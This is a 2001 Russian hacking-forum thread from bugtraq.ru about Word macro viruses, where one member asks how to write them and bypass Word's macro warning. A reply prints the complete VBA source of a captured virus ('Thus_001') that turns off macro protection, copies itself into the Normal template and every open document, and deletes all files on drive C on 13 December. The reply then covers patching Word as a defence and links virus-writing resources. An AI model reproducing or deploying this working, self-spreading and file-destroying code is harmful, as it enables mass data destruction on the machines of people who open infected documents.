информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
За кого нас держат?Где водятся OGRыПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
макровирусы ;) 26.05.01 15:52  Число просмотров: 988
Автор: asker Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Если нет, то это замечательно...
<hacking>
макровирусы 23.05.01 20:09  
Автор: asker Статус: Незарегистрированный пользователь
<"чистая" ссылка>
где можно найти доки о сабже (особенно о шифрованных и т.п.). Принципиально интересует вопрос: Отучили ли люди не вываливать сообщение в мсворде о нахождении макросов?
макровирусы 23.05.01 21:37  
Автор: :-) <:-)> Статус: Elderman
Отредактировано 23.05.01 21:52  Количество правок: 1
<"чистая" ссылка>
> где можно найти доки о сабже (особенно о шифрованных и
> т.п.).

Кое-что есть в Infected Voice. А вообще с этим все просто: берешь вирус и смотришь его исходник, читаешь хелп по VBA.
Вот недавно поймал:
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = .
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub

---

> Принципиально интересует вопрос: Отучили ли люди не
> вываливать сообщение в мсворде о нахождении макросов?

вирус может отключить это предупреждение:
Options.VirusProtection = False, см. приведенный исходник

Но вообще это фигня: можно пропатчить msword97.xlb, заменив в нем строку VirusProtection на VisurProtection, и ни один вирус, который будет пытаться это сделать, не запустится: при открытии зараженного документа Word скажет "Ошибка компиляции" и откроет исходный код вируса в VBA. Также можно пропатчить Word так, чтобы не работали макросы AutoOpen, AutoExec, FileOpen, FileSave... и т.д. Короче полная хана всем макро-вирусам :))

2 dl: А virii board не будет?
макровирусы (:-) 23.05.01 23:17  
Автор: asker Статус: Незарегистрированный пользователь
<"чистая" ссылка>
ok, спасибо за ответ, Да на самом деле IV - классный журнал, да и c MZ, NE, PE, у меня есть опыт, я только ими и увлекался-rulezz, Вот решил поробовать с макро, из-за одной только причины, у меня в универе появился macro97.virri, кстати тоже thus.based, который столько крови попортил мне, и др студ-м, что я сабж начал изучать.
СУТЬ ПРО Принципиальнй ВОПРОС: Смысл в чем: Допутим машина чистая: параметрах, стоит защита(целка). Придумали ли способ, на такую машину сразу (открывая файл) заразить шаблон, и.т.п сразу (ессесно все патча отпадают) без этой мессаги.
КСТА: про вирус раздел в форуме я ЗА!
PS. у меня толь1-12 issues, где можно больше нарыть, и есть ли еще т.п.?
макровирусы (:-) 24.05.01 14:58  
Автор: :-) <:-)> Статус: Elderman
Отредактировано 24.05.01 15:11  Количество правок: 1
<"чистая" ссылка>
> СУТЬ ПРО Принципиальнй ВОПРОС: Смысл в чем: Допутим машина
> чистая: параметрах, стоит защита(целка). Придумали ли
> способ, на такую машину сразу (открывая файл) заразить
> шаблон, и.т.п сразу (ессесно все патча отпадают) без этой
> мессаги.

Насколько я знаю, это невозможно.
Рекомендую пропатчить Word, Excel, (весь Офис...) и забыть о макро-вирусах

> КСТА: про вирус раздел в форуме я ЗА!
> PS. у меня толь1-12 issues, где можно больше нарыть, и есть
> ли еще т.п.?

Посмотри тут:
http://sbvc.cjb.net/
http://www.sallyone.com/
макровирусы ;) 26.05.01 15:52  
Автор: asker Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Если нет, то это замечательно...
ССылочка... 26.05.01 17:05  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
<"чистая" ссылка>
Думаю, будет интересно почитать...:
http://www.uinc.ru/articles/17/index.shtml
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach